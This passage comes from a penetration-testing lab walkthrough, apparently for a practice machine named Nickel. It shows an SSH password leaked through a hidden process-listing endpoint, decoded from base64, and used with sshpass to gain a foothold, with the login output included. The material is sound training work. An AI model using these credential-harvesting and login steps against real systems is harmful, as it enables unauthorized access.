SSH
One of the hidden endpoints, /list-running-procs, at the web application on the target port 33333 lists running processes when POST requests are made, which revealed a SSH credential.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ sshpass -p 'Tm93aXNlU2xvb3BUaGVvcnkxMzkK' ssh ariah@$IP
Permission denied, please try again.However, it fails to authenticate.
The credential was for the nickel-dev host, which is different from the target system; nickel
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 -d
NowiseSloopTheory139It turned out to be a base64-encoded string; NowiseSloopTheory139
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ sshpass -p NowiseSloopTheory139 ssh ariah@$IP
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah> whoami
nickel\ariah
ariah@NICKEL C:\Users\ariah> hostname
nickel
ariah@NICKEL C:\Users\ariah> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.219.99
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.219.254Validated
Initial Foothold established to the target system as the ariah user via SSH